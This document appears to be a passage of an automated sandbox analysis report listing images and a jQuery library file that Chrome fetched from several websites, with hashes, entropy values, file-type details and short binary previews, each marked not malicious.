                                              Category:dropped
                                              Size (bytes):11000
                                              Entropy (8bit):7.9603650478314645
                                              Encrypted:false
                                              SSDEEP:192:OllZQTrIUDriALhGQtzvHDhQXhVzMh9c7oYTpYW9cQ9DWhT6JaF1:OvYriALltzbhQMhmtFvNo/
                                              MD5:C08A9DD91A226B9972DF432D7B556BC4
                                              SHA1:C308BC63CA2877D21BEDCFA4535F2D019F339E63
                                              SHA-256:16333368EE482FAC88E6961A88D031011F70838C033AFB0A30C7D9B0C2BA5971
                                              SHA-512:3919ED84806941B7152B5FB5B083F3963E4E7638FDBBE282FCAE202591E42CE52C031106A5C6FDD16875A77B22237677E2EDFA83A6856E7EACF6E8C65EA0DBAF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:D86C9B45D7D111ED9532E4B2CAEF69B1" xmpMM:DocumentID="xmp.did:D86C9B46D7D111ED9532E4B2CAEF69B1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D86C9B43D7D111ED9532E4B2CAEF69B1" stRef:documentID="xmp.did:D86C9B44D7D111ED9532E4B2CAEF69B1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.?...'hIDATx..].|TU..&3.LK.@.J..JUW,.U)"......!UXQA.Q@z[..".H.A."....dZ.I&e...{'...u....n...}o....w.wnS....}..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):32160
                                              Entropy (8bit):7.993644744521096
                                              Encrypted:true
                                              SSDEEP:768:Ys+iynf37R3+moZkqKBcJJnYtu4eC0emuBgy:YvfrR3gKB0t6q3emVy
                                              MD5:C899DA1AB8A7896B147D2D686087C759
                                              SHA1:17256927C0847119B5C2ABEFD347ED48D413E732
                                              SHA-256:9384116F6A09587459A634B2D5C2B2E6BB162702213409A82499418F31C4FB4E
                                              SHA-512:205D3BA58BD263498C820D7E2CAF68B8772B7934D5B4421F40745E3CF195FAC987CBD5CE8F7E7BD3F2909F632E83C1AD044C496BED33DB6E25FCA0C36445EB32
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/26/a417b2689f08829d773cb2abc660a2f4.webp
                                              Preview:RIFF.}..WEBPVP8X..............VP8 $}.......*....>.r.T),*."..Z ..gK.............b...w.=7.S<..(.s..:.Ze....p./.5l...$.-.F.....l..>.9..._..8.>..........._...x....~.......rv..._.t?.-@.....s.=5.....g..B.....u..%..h...g.&P.Y..@.+.Oy...P.8...<.'4m. c.......5..l..P.......?..%.k.......4.l.b.Br.&.M.\.z...E..Z.....>...\TQ..L.NB.C...G...1Mj....a.......eaM.../.Ok...Q.........W..).M.]..'`.8R.>..W...,.........$...........Dlh.+.I....E..[Hc$]......h..d5...m..].......1..Z..*......}.l]r.......s...L.S.yL...8.$..9.5&..YS;.(...9s...L3;...H0.Q.r.......I..L.}..e..f.'....[...$.^...3A`L>...1.../_/C....&N.{....2...y.4.Ib.....m.D.....F}t....`......^.J.J...G..t.pwV3......8. .=Yn.1q......&.<....Q......!E}B.z.3T7.3c...2.?.j..@..1........i.d...?Y..4..u..zE.,#-.34>h4..!.......kf.TH...(#.........P....3.Pm..g....;F.|..:9..R%.#.I..|,...p....+...X.....r/l...;_.Z.J.!....8{.a<..?.0'k .E.U .0..9..&...j 9.!.w..{...UX.=..u......j.v.x].@..R_ U.....c.xH.....K....Tk...V..rp..E.h.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:dropped
                                              Size (bytes):71185
                                              Entropy (8bit):7.983687439159336
                                              Encrypted:false
                                              SSDEEP:768:Y81BlAoXzD/z179/hVwho4OYiXK6Pmj6Iu924FZxQZ1HT72abs2YHkzZTvpntlpv:YO/z3/hVwKZ2WmjdubFZGZh7rbKMTSAj
                                              MD5:E7CF6E022BA22E7BB0448673997E9A04
                                              SHA1:3528969B7D284CC524A05121E146123D17CD1782
                                              SHA-256:48D437218DADB916B022215CC03AFA61B3EA0B5FFAFA6A61D3A2E755B1FD709E
                                              SHA-512:2B70E89736282DE36F4BE4FB49726C00D216BBAC941F083E7415F4F02FBC4E61467C8ECC91C1221BF1A69D7F75A16CF76B538EBA6675456A0CA529B23636A758
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF..........................................................................................................................................................."........................................S........................!..1AQ."aq.2...#BRb....Tr.......3CS.....$s...Dc...4.d..................................?........................!1.AQaq."2..B......#3Rb.r....$C.....%............?.....~I..._.....~K..._....-[.[.db<T..l'.o.E.k.._.p.....Z..8$.x.3.._.p....?.._.p.......8#..?.._.p......l/.o.E.jk-+-.G.b<T..[......~...l/.o.E.jl-t-.G.b<T/.W......~.P.L'.o.E.jmV..F..&#.A...~I..._..7O..&...~...J.F..F#.A...~I..._............O,t...-..G............-wC..&..x..X.)k..[...._........_..7?.....x..X.)k..[....^]...G.../.K........?..+.-c..x#...sp_..?w..R.s0_..?w..U.GKX.....x...f..,'....X...XO...b.JT..x#...x/...C.)cr._.a?v..U.%,%.[....Z........?..7'.....h..Y.R.Q.....U..8....C.+.r0?..?v..U......x#.._...8?.....F..............x%.x...|..8?...........h..Y.W{:0..\G...A.?....v..W..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 3240x2430, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:dropped
                                              Size (bytes):230362
                                              Entropy (8bit):7.9971622178218
                                              Encrypted:true
                                              SSDEEP:6144:EJTFtqNgqkc1JK/YOG0vsq5cEIeCQcJfz2ceklv8vwvdhwgcF9Z2cJ+BdoujxctL:zSyd8fsOmbwgm9Z7J+BdouFcJm7c
                                              MD5:932B29A45ABB7812BB6F2D7D24DAC67B
                                              SHA1:BED5808782082BAF58163796A6FEF91209AE72DC
                                              SHA-256:79C9563E3B20BE58FD8AAB4EEE3E5EDDF4F3FA0FB127A5CC1A4653F90E5AB7FA
                                              SHA-512:C71A0FEC7CB390D2BB8622931D0FB6D92645774894FE5E6664B9C34B33256BC64C1270B2F418C22BCD0C5E054B813B3C6DF12062A7E0B71018B674A5D409C533
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF...WEBPVP8 ...0....*..~.>Q&.F...(!1.9...in..............^W`...}..........f.Umz.m.....\~..C......|'......_.3.?.g}.......k./....A...4~O.......~I.m...+..'..}h..wy......G...7..?.?..!.i...].....[...#..c.G..............n...r~$.x.4.2.....O....g.....G....}.........{......h.3......?5~..7......u>......?..;~k...w...S.?....~..s...~.g.W..C.w.g.?_..........$.......w.............._...?..............>L............_............O.?......d.?........o>....r.....?._._......h..s...p.G..h...kEj..Oy...W:.).>..j.O.|..*(..P.m.(..!.0QZ.u.S.~>...ZMh...AC:.).>..k...M.....6.u....i...Z'.G..h........L..u.S.}...Z...b!&.@..w.'..yV*%.?R.=.3.ey..6.u.S.}..'/|.O.=/..>.......P......J{.g2.I..6.....h..s......7E....J{.,P`....P...]?Z{8....rr...Ui.6.WN.D.k.+.T.sb.x.3...O.LV.G..a2..B..6.u.S.}....J{.|..p.$xh..s....v.....z..>...|....>......9....*..).H(.+.i......Z...D[KD.#}..43.....s...E..rQB.Pr.Q>.>n.G.U.,v.>#.Z.u.S.}.......a6.m....4..<..\.D....*..TO.e...{..]..:.).>............w.4
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):2390
                                              Entropy (8bit):7.570503951031916
                                              Encrypted:false
                                              SSDEEP:48:/11LNn2TkJ33LpvaN7LAf+xKuW83iJMerMNDiWp8AyA8L/Pu7:tX26pvaNHAf+EuW7tIzxB87C
                                              MD5:1DEDD95A3E6D56997B626323F6A2AEF7
                                              SHA1:EF4966E703966F2BFDE32BC2C286484465A8013B
                                              SHA-256:FEFD3F4E2D9A84F21C177B94B036FC59705CF65D5CB35997C3ACAC22B1029672
                                              SHA-512:A8AD4ADED17C7C5C3D1DFA295F53C426E1366C289071F2E96E51BDF6BA60780853F269444354BA5F6F70DBF58EA0513F0DA3D9D9FD25DCD086D9F85D2598E4A6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...P...P............tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:807AF45A47A411EB8ECBFF6BC59472BB" xmpMM:DocumentID="xmp.did:807AF45B47A411EB8ECBFF6BC59472BB"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:72E0E3FF475711EB8ECBFF6BC59472BB" stRef:documentID="xmp.did:72E0E400475711EB8ECBFF6BC59472BB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..F.....IDATx..Ml.E..w..i...F..C. H4TQ.8=...,.....!N.....8"S..!.:...#%. q...U*j..ZD.BS.j..q..f.q....~.x=O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1280x600, components 3
                                              Category:dropped
                                              Size (bytes):44333
                                              Entropy (8bit):7.204157271870355
                                              Encrypted:false
                                              SSDEEP:768:vwOEkMY3xuohdQD6acfBZvTSn0w3pTySjObPdnHbXG8k7cCDq:vJXhJ7u61pZvTSnSSjOhH7G8ye
                                              MD5:1DEB0CD2A0170E08F7F5F2C251BF6C97
                                              SHA1:3635F1D8C940D6FECF55FC5856ECC364ED8FB5F8
                                              SHA-256:A641646A0356D7932B572CBA159C838D53BA93FB49BB2340B6BEB823515DEDC4
                                              SHA-512:86EF56E098CFCE9A640496A47DAE6619F592A7DA7FE7FB38BAEA7D7B213BA97536FAC897CC48F64F181110E0A269F54FA657500502E5418227B32426219AD538
                                              Malicious:false
                                              Reputation:low
                                              Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmpMM:InstanceID="xmp.iid:9ECCFE5F935111ED9BC3D7E09324EC22" xmpMM:DocumentID="xmp.did:9ECCFE60935111ED9BC3D7E09324EC22"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:9ECCFE5D935111ED9BC3D7E09324EC22" stRef:documentID="xmp.did:9ECCFE5E935111ED9BC3D7E09324EC22"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d...................>...p"...+................................................................................................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):16112
                                              Entropy (8bit):7.981733788557358
                                              Encrypted:false
                                              SSDEEP:384:6Vep4CWsfb3olIUjU4c1TKY8ZsxCXyB/PFHq3SvQ:me1b3olIUjUn/8cC6NHq3SvQ
                                              MD5:904F0FCE3144974E27B270009EB59034
                                              SHA1:127533E94731F1D7D9867BABE5FAC0496F91BC20
                                              SHA-256:A185EB6BF39D270CCE11A7C40D7A4FB5F485F19B3B4730FF5BDCF5AD9B762028
                                              SHA-512:02F1116DC57F5D8243E23DC4F1ACCDFA125366091FE5698A1014B3DB05F66BE738700452B627BFFE275EE74F59BC62F22739A6651A6E57EA1417BC668A4ED57D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i15!2i21415!3i14014!4i256!2m3!1e0!2sm!3i707457485!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sUS!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y4494427010317758935!2y5827414787517094799!2s%2Fg%2F11bbth6f7x!4m2!1x251881333!2x552584050!15sgcid%3Ageneral_contractor!2b0!3b0!6b0!8b0&client=google-maps-embed&token=126684
                                              Preview:RIFF.>..WEBPVP8L.>../..?...6..X.......MZ""$.l.}...p......w..#*.l.!$s.g...m'.K2...Km.I.|B..N..;.!.(L.D!.DG......$C$.?..........&...'.A"..F.....f......../C...rP..wDAQf.A4C3H.02B2.yx...Z<...........#...5.YY.q.........E..S..wE....e.v...Q...^O.*Y..R.....*...sVq.......5o^s.5o^sV.`.e#..f.o.L2.I..L...L...5k..._...9.m...l..U...l.......4..ZU*.......&&j...{...0..``.2.&.)....,.....[.....D...l+a.K.Zb.F.I~......aWt.......x...._..<..... ..eJ......Z...b.....m..)S...%.T..k....S..-....>"v...K._..A4.o...ibP.7.'`.&.....z......(..(....n.03.............+......o..H...u......>.8..YD..F._.....!"^.0.Y . ....."z.U.5\.....E..9/...).VQ..#.q..+..ON.?\#03B./...1w[..5......^5...2.:D......x...xnd.M.E....s.........H.e...F.*....M.~..A.=..o......D..m...r.u.kF...6.u%D..E .%..B.... ~s...b...Z.AV...o..S.....z1..d...0C.>..}........{.....E.....Q.....Vz.p..or.-.F~+.N^\+p.V.......X....N.u./..v-.G.......u....n..g.../q).,R..Z.....`..dM.R....2|.9..b%V.r...U..c.s.1q....z.aQ
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):7157
                                              Entropy (8bit):7.953901949459065
                                              Encrypted:false
                                              SSDEEP:96:PllcHitlIxv9vk7C1+I4wWHLihk/xwS1u9MEx920SGf3P48GrShaw2JEQt0yizKb:UIIHUCD4waj6MP/Y3VGrI2VCfeUa9Pl
                                              MD5:C0C933C819A729942285CEB4BB699705
                                              SHA1:58F78F512ECEBAA14448233C963B56AD7E405F72
                                              SHA-256:5EB976BDAC67354D8EC305FABB7C1793FBD7636CA0C7E560D92D3066FE5D23A3
                                              SHA-512:4508AC1D9EC100DB3C53BC77125BE8005E2C78250F9D0E919CF1D080856A1995943872490AC5D21100723F888FDB6BDA927A4A49ACE88594B1D317E63BF86254
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):21796
                                              Entropy (8bit):7.9762495517669265
                                              Encrypted:false
                                              SSDEEP:384:K0wD5FZrr6BSQw+81bnHw9vfpx7189Iz4tfn5fY7TTsIW0ZC1IWAIdgZKCg7:K/FRrke9jHwVfjJ8ez4t5gbsID/DZKz
                                              MD5:94FBD84C3C40E96AC9B7BA04F083A431
                                              SHA1:A51F3CC5451F02B718F72B79F0673E07681AE58F
                                              SHA-256:214499ADDD871CABDE720E2C551843C9D5B675546C2115CE5221AFCF06569323
                                              SHA-512:2D8CD775695AC7D73C882B3E7BBAD0003E157C0BDFA609CDDBD0B5543A21B6C210865BC4C7D0EDCD8BCFC4BFCB91B741702578047F9DB68FC21D92DCC89F4B34
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6814
                                              Entropy (8bit):7.365429319600115
                                              Encrypted:false
                                              SSDEEP:192:YW/wgI2YR8hF9UFLON62rAWjoN4tnedYg:YW/w3RYF9UFLOMNpawb
                                              MD5:126D34B809BB5841AAE76899DFBF37F1
                                              SHA1:C62515CFA8738055C349774D6819E97B03828CC4
                                              SHA-256:10994C88D58D175E1DB374230FE8C187DD292A73259EC568E4F822C030768D5E
                                              SHA-512:D8C78498ABFE9DE467E285E8966DFC225E74873CD264C7D80D573E67EB26746FBFA60852F7FD445493617C7695A48AC33F7CB56EF3F4B40E3349B3FAFDAF7616
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............x......sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....IDATx...{..ua...s.{...*.D.Q...RjBlI2.8:...L..`.U..Nm.L4......Y....8c.i.s.&k...h ......v.Y.=..s.<.C~.e.......>...OG..qf?.....UH..zjb..|.c@<.......>..=......O..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....H..@.....h*...rQ..L.={>.....].n.}...;..}.C..=7...c........>..B...@.B..m.p..O.G'..... g..`......@..........@....q.1.=".,...g.`.{D.....O3......"...4......!...X.G......o...#.H...........&..b58.=".d...H-.... I..(N...#.H.....a.{D.I..@1".... ...(B...#.H...:/.....D'..NKp.{D.Q.........@4.....G.....:'......N.........Z%....x.{D....@'t`.{D....@.:4.=".... k.....@...........1...R...#.h....S......N..Y)p.{D.c%..l.<.="....@...SD.c!.....c..F&.....%..F"..d......M..I2.}...E...1.....L..I1.C...D...0.#...M..I0.c#.....3.c'.8!..De..#.X....1....,I..Q.....K...3.....C...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):24308
                                              Entropy (8bit):7.841289930655488
                                              Encrypted:false
                                              SSDEEP:384:4YNg7O44ho21kGP+/59qIqAj8tSBdLS4WohbqodUsdJ/BoOiOiouhDkMeTTmPVT8:4YyC44aI/PKuTG/LSX0bjUsJpoOinoNT
                                              MD5:BA514260DAF33C925D6286D1250A2D0E
                                              SHA1:BC12F313426F883DD8682A5972D0A3DFC8E3AB3E
                                              SHA-256:F36159395939A5B821689CE912CD02C491238259A8FC1569A1AF1A4CA653D97C
                                              SHA-512:5EC206EEBFBA15EDC97D17E11B6F17D0CB88D4B8ECC35F1829C864CADAF9FF61C86A63F4DD99F3EA507C07B79AE9F5842A74B99EBF5321D0DB042E31D24DB064
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/19/37833655a3a1def36d3ae9474560c832.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):79278
                                              Entropy (8bit):7.974495601645318
                                              Encrypted:false
                                              SSDEEP:1536:EB4xKgSAvVgHk0lvGafqVlkIjUbPLfOi84USf9MlYB67lSAb7pcK:EWxhSAvGlhGNWIjQP7FJUSf95B6l7pL
                                              MD5:9D96C460ECF406BF6F8BFC1464A5C70B
                                              SHA1:9063CCCD80F3E5E9873F58FEE3C60F815A562C67
                                              SHA-256:281C8B4E195F9B496C5EC98A5AC7E86E777CC18C43EDA8F5F922EDBA6D7C72B1
                                              SHA-512:517CFF8E815D4546B2A35CC45D3F392DF5FA053B6BE8825243E0922BEAF54E1A8B61B9AABE4B41AF8F15FF383AFD694826D68EC387DC5CF2DD159A8C056A7EC1
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."..................................................@.@.P.......P..P.AUUT...@...(.........8QL......................................*......].....@.P..PP.....T.EU.\.......*...(.*..(.(..5 @T.@.........QEU...QEW..((.*...*........QT.. ...........*.(.....*.(......(..*......(........(.(...(.(.(*...(............(.((.9EPU..*.....Q@...@.P.TP.QE.....U..@........P.W.(*.......(..........................((................(..............(...................*.............(.(.....(.(.......*...............(..(.r..*.........(...8.@PPp(.(..v..(............8......P...QATPP...E.E.QEPP..w&..Q@P.E...P.EU'..=.>oP.A@QAE.E.AE.P...P..U.U..v(A..`...............=.q...e....AE..G..*..(..8j..(.......+...............p......(..(((..........?O...,.\.....B. ....@..@QT].\..<...5..c..P...Q@.MdnX........^.&.C...!..vY.s...{>ml...((........}fe....M.].[3.....P
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 500 x 505, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):96564
                                              Entropy (8bit):7.992383226973363
                                              Encrypted:true
                                              SSDEEP:1536:EVGMiW5mfWPMwyvj21VThLuvcJJ/iwcFReM6+AAdPfV8p0EdapiwHQs01hDBqai:EVGMRmfWkwWU76o6wcPeMoKPfep0Edal
                                              MD5:76F591BC5EAD2B8AFC0E8A4DB01F8504
                                              SHA1:F6B77A755B2D7346DD6C92508D09747FC991FE6F
                                              SHA-256:B6A0DDF3BA99A704FC08B4F13BDE833AA525989BA348ED63F5780FA0A871F0E4
                                              SHA-512:2193C7D1A26B3E7036123D3EF6583EDE4A6500AF4AA523906D866E6C9397E057E998D5123E9E0C0D22D23CAE02F5FA09464BC50D2AA28DBB6DA57BF709512C54
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/mainbannne.png
                                              Preview:.PNG........IHDR.............@.<f....PLTELiq...gl.<0!Z..}mb/<c...`~.PUraH'.g%..........t.u){...P..=..m.J.._..7....S..C......../...+8@....>..v..I.......e..a.*........}.}...Y....C......;..E.3.w#.(.0.9...<..?...!&.*.o...h;(.. o.r.v....;.].5V2...&.YE...d.~ZJ.s..|c{K.....].......M.5.......ZC..TwL<.wb....F.V....W..$|....jQ...jO.U7)...F.`E8.......h..6DM..v..).tZ.....$....qBMTy...."-3+...R9.(}x<(..J.sVj@.........iB1I(.....~MXb.h.Zdm.J..h4$.`...g$cq|....jY....D/.n......ZC'..unj..........:...Q.....tRNS...Z6....Y.Z}.r..4c.....pHYs............... .IDATx...O.....KZ.*.:=l...x..7.liT.<...`?@.5b=..p<#.. ....G..;%Y..cYF.a...N.....w.&.......i0..4..s.|?...<...p...y8...<...p...y8...<...p...y8...<...p...y8...<...p...y8....3......._~..~...x4..O>y.....}..{8..Y.m"}Kg<..Z.h..j..V.5.../?c...x@......1X.F-~..n7.mE..d2..Iv..O?..~.R.............~.[...s.t..d............?....G.....h.U.&..n2..n...[.....ah.z........+..6tz...j.h7..F.......q
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65451)
                                              Category:dropped
                                              Size (bytes):89476
                                              Entropy (8bit):5.2896589255084425
                                              Encrypted:false
                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                              MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                              SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                              SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                              SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):10057
                                              Entropy (8bit):7.448299683190635
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwy4/niA6NqchjiHe5BLuhPZ6sHAJHiQSMT38:4YNg7y4/nitqchji+50hP0CAJH3lo
                                              MD5:700853572ED51D81A5132F5DC2754342
                                              SHA1:0B755538AB4563C2DBB75A2AB886602B00AD3545
                                              SHA-256:AC354E3D27A3E0A63BBB74D037351D9F7A9F5F88E23C88BF1404CFFC8B8F7BB3
